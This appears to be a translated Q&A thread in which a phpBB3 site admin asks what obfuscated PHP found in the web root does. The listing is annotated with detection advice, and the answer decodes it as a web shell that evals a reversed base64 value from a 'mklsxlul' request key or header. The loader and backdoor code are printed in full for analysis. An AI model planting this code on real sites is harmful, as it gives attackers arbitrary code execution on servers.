2016-07-21 29 views

我爲一個非營利組織運營一個網站——它運行在 GoDaddy 上託管的 phpBB3 系統上。網站開始出現滾動連接問題。我在根目錄中發現了幾個「奇怪」的文件,我知道這些文件不是我自己放在那裏的。有人可以看看代碼,告訴我這些文件在做什麼嗎?在服務器上發現惡意 PHP 代碼——有人能告訴我這段代碼在做什麼嗎?

<?php 
// NOTE(review): obfuscated PHP backdoor loader, reported as found in the web root of a phpBB3 site.
// The listing is kept verbatim for analysis; only comments were added.
//
// What the visible lines do:
//   1. A long run of `$word = '...'` assignments defines short strings. Many are never read again;
//      a few act as character tables that are indexed one character at a time, e.g. $hydroxy['1'].
//   2. $bar is concatenated from such lookups into the string "create_function".
//   3. $hog = $bar(' ', 'eval(array_pop(func_get_args()));') builds a lambda that eval()s the LAST
//      argument passed to it and ignores every other argument.
//   4. $hog(...) is then called with several throwaway arguments followed by one long concatenation.
//      That final string is second-stage PHP source which merges $_REQUEST, $_COOKIE and $_SERVER,
//      reads the key "mklsxlul" (falling back to "HTTP_MKLSXLUL", i.e. a request header), calls die
//      when neither is present, and otherwise runs strrev -> base64_decode -> strrev on the value and
//      passes the result to eval(). Whoever can send that value can run arbitrary PHP as the web user.
//
// Notes for defenders:
//   - A plain-text search for eval / base64_decode / create_function does not match this file,
//     because those names only exist after concatenation at run time. More reliable signals are:
//     files that are not part of a clean copy of the application, a call through a variable
//     (`$name(...)`), and dense runs of `$var['N']` single-character concatenation.
//   - Request logs can be searched for the parameter/cookie name "mklsxlul" and the matching request
//     header; POST bodies and cookies are often not logged, so an empty result proves little.
//     The name is presumably specific to this infection and may differ in sibling files -- verify.
//   - create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so this loader only works
//     on older runtimes.
//   - The literal '[email protected]' assigned to $ardently below looks like an e-mail-protection
//     placeholder inserted by the page hosting this listing, so the text here is probably not
//     byte-exact to the file on disk; do not derive hashes or signatures from that fragment.
//   - A file like this indicates that an attacker already had write access to the web root, so the
//     original entry point still has to be found after the file is removed.
$katya='=KIT(a'; $choral= '$'; $fireproof='c'; $avivah= '=UlQy'; $islander= 'O'; $endosperm = '_s'; $fume=':S_:uee'; 
$knighthood ='WH'; $bars ='r$m'; 
$delicately ='D'; $caterpillar = '<ElUsabt'; $daydreaming ='$'; $contrasting = 't'; $gladys= 'S'; $complementing= '('; $kink = 'CK';$goblet ='X';$astigmatic = ')eklE';$ethane= 'l'; $aquamarine= 'Q'; $amalgams= 'u';$ardently= '[email protected]]L;"'; 

$cruelly='e';$lateral = 'P'; 

$chased = 'G'; $aspects = 'e,girT';$dismayed ='$x$Le';$handicap='s';$glints ='d'; $cursing=']Eg'; $jurisprudent = '[ac';$indeed ='M'; $influenza= '_'; 
$dehydrate= 'a'; 

$exch= ')__';$felling ='s'; $jedimaster= 'leFa'; $interrogating ='M'; 
$exaggerating='TLstSi)(_'; 

$introduced='['; $barrette='ARLEn;E;'; $halfhearted= 'o)"s$(fm';$jeffy ='O'; $ange = '9'; 
$handicraftsmen = ')p'; $giacinta = 'r[("KeHLv'; $johann='d'; $efferent ='r';$involving='l'; $cornucopia ='d';$assortment ='$u>U(vSov'; $idles='a';$decimated='`'; $grater = 'e';$chewing = 't'; $kayo='"';$currant =' ';$astronomically ='6'; $decomposition= 'Yo';$dukeleto ='cbi'; $diverging ='O'; $earning = 'e"';$caveman = '?'; 

$independent = '"'; 

$lab= '=(ia$'; $anode = '$';$jixian='y';$freights = '[E';$approve ='(__'; 

$gnome= 'KLeptre'; 
$crimson ='r'; 
$chandler='i_X$gaa';$edits='?';$blunderings='_';$attraction ='P';$avoid='k)rRf7vX';$liabilities='4';$blaster='P'; $alumnae= 's'; $daveen ='VecStT_';$crop= 'esm)Mr'; $isles ='tLnga"'; $beniamino='rRuiJVe';$concentrators = '"'; 
$commando='i'; 
$angrier ='i';$boatsman = 'RhTT_;B'; $informal='s'; $anode =':';$compatible ='^';$catherine = '8In'; $blade= 'e'; 

$inquisition ='['; 

$brutalize='l'; 

$garfield=']Us'; $cruisers = 'r'; $galleried = 'H'; $garvy = '(5d';$lesson = ')6';$gunplay = '('; $fertilization =','; 

$halibut =')'; 

// The last statement on the next line starts $bar. Every piece is a one-character lookup and the
// pieces concatenate to the string "create_function".
$bravura = ';)lCa';$lamp = 'N';$drain = 'c';$hydroxy ='fa)Z'; $beetles= ']]i(x';$daniella = '?';$bar=$drain. 

$cruisers .$blade. 
$hydroxy['1']. 
$isles['0'] . $blade. $boatsman['4'] . $hydroxy['0'].$beniamino['2'] .$catherine['2']. 

$drain. $isles['0']. $beetles['2']. $decomposition['1'] . 

// Next line: final character of $bar, then $bulls = ' ' and $hog = $bar($bulls, <body>). The body
// concatenates to "eval(array_pop(func_get_args()));", so $hog eval()s the last argument it receives.
$catherine['2']; $bulls= $currant ;$hog=$bar ($bulls, $blade.$avoid[6]. 
$hydroxy['1'] . $bravura['2'] .$beetles['3'] .$hydroxy['1'] .$cruisers.$cruisers. $hydroxy['1'] .$jixian. 

$boatsman['4']. $gnome['3'] . $decomposition['1']. 
$gnome['3']. 

$beetles['3'].$hydroxy['0'].$beniamino['2'] .$catherine['2']. $drain . 

$boatsman['4'] .$isles['3'] .$blade .$isles['0'] . 
$boatsman['4']. $hydroxy['1'] . $cruisers. $isles['3']. 
$garfield['2'] . $beetles['3']. $hydroxy[2]. $hydroxy[2] . 

$hydroxy[2] .$bravura['0']); 

// Invocation of the lambda. The leading arguments ('7', 'D', 'U', '$', $lucia, $corporacy[2], 'B')
// are never used by it; $lucia and $corporacy are not assigned anywhere in this listing. Only the
// final argument matters: the long concatenation that spells out the second-stage source.
$hog 
($avoid['5'] ,$delicately, $garfield['1'], $chandler['3'] ,$lucia , $corporacy[2] ,$boatsman['6'] , $chandler['3'] . $beetles['2']. $lab['0'] .$hydroxy['1'] . $cruisers . $cruisers .$hydroxy['1']. $jixian .$boatsman['4'].$crop['2'] . 
$blade.$cruisers . $isles['3']. $blade . 

$beetles['3'].$chandler['3'] .$boatsman['4'] . $boatsman['0'] . 
$freights['1'] . 
$aquamarine.$garfield['1'] .$freights['1'] . 
$daveen[3] . 
$boatsman[3]. $fertilization .$chandler['3'].$boatsman['4']. $bravura['3']. $diverging. 

$diverging .$gnome['0'].$catherine['1'] . 
$freights['1'].$fertilization . 

$chandler['3'] .$boatsman['4'] . $daveen[3] . $freights['1'] .$boatsman['0']. $beniamino[5]. 
$freights['1']. $boatsman['0'] . $hydroxy[2] . $bravura['0']. $chandler['3'] . $hydroxy['1'].$lab['0'] . 
$beetles['2'] .$garfield['2'].$garfield['2'] . 
$blade . $isles['0'] .$beetles['3'] .$chandler['3'] . $beetles['2'] . 

$inquisition . 
$concentrators.$crop['2']. $avoid['0'] .$bravura['2'].$garfield['2']. 

$beetles['4'] .$bravura['2']. $beniamino['2'] .$bravura['2'].$concentrators.$beetles['1'] . 

$hydroxy[2] .$daniella['0']. 

$chandler['3'] .$beetles['2']. $inquisition.$concentrators . $crop['2']. $avoid['0'] .$bravura['2'] . $garfield['2'] . $beetles['4'] .$bravura['2']. 

$beniamino['2'] .$bravura['2'] .$concentrators . 

$beetles['1'] . 
$anode . $beetles['3']. $beetles['2'] . $garfield['2'].$garfield['2'] .$blade . $isles['0']. $beetles['3'] . $chandler['3'].$beetles['2'] . $inquisition .$concentrators .$galleried. $boatsman[3]. $boatsman[3].$blaster . $boatsman['4']. $crop[4]. $gnome['0'] .$isles['1'] .$daveen[3]. 
$avoid['7']. $isles['1'] .$garfield['1'] . 

$isles['1']. $concentrators .$beetles['1'].$hydroxy[2] .$daniella['0'].$chandler['3']. 
$beetles['2'].$inquisition .$concentrators . 
$galleried. 

$boatsman[3]. $boatsman[3]. 
$blaster.$boatsman['4'] . 
$crop[4].$gnome['0'] . $isles['1'].$daveen[3].$avoid['7']. 

$isles['1']. $garfield['1'] .$isles['1'].$concentrators . $beetles['1']. $anode. 

$garvy['2'] .$beetles['2'] . $blade . $hydroxy[2].$bravura['0'].$blade . $avoid[6]. 

$hydroxy['1'].$bravura['2']. 
$beetles['3'] . $garfield['2']. $isles['0'] .$cruisers. 
$cruisers. $blade .$avoid[6].$beetles['3']. $dukeleto['1']. $hydroxy['1'].$garfield['2'] . $blade .$lesson['1'] . $liabilities.$boatsman['4']. $garvy['2'].$blade . $drain. $decomposition['1']. $garvy['2'] .$blade.$beetles['3'] . 
$garfield['2']. $isles['0']. $cruisers. $cruisers.$blade . $avoid[6] . 
$beetles['3'] . 
$chandler['3'].$hydroxy['1'] .$hydroxy[2].$hydroxy[2] . 

$hydroxy[2] .$hydroxy[2]. $bravura['0']); 

大多數這類代碼會打開一個入口,讓攻擊者上傳控制面板或執行他們想要的任何操作 – cmorrissey


所以這個腳本實際上是取出 `$_REQUEST`、`$_COOKIE`、`$_SERVER`,將它們合併成一個變量,然後從中查找一個特定的鍵,對其值進行解碼並用 eval 執行。基本上攻擊者可以用這個腳本執行他們想要的任何代碼。 – cmorrissey


除了逐個檢查每個 PHP 文件之外,還有什麼建議嗎?有沒有什麼特定的字符串,可以讓我在多個文件中進行搜索?任何建議都不勝感激 –

回答


這是一個 web shell(後門)腳本,解碼後的內容如下:

// Decoded second stage of the obfuscated file in the question. The leading "B" is not PHP: it
// appears to be the last throwaway argument ('B') that precedes the payload string in the loader's
// call, printed together with the payload.
// Behaviour: merge $_REQUEST, $_COOKIE and $_SERVER into $i; take $i["mklsxlul"], else the request
// header exposed as $i["HTTP_MKLSXLUL"], else die; then strrev -> base64_decode -> strrev the value
// and eval() it. The value is fully attacker-controlled, so this is arbitrary PHP execution.
// For triage, the key name "mklsxlul" is the searchable indicator in request logs and WAF rules;
// it is presumably unique to this infection -- verify against other suspicious files.
B$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["mklsxlul"])?$i["mklsxlul"]:(isset($i["HTTP_MKLSXLUL"])?$i["HTTP_MKLSXLUL"]:die);eval(strrev(base64_decode(strrev($a)))); 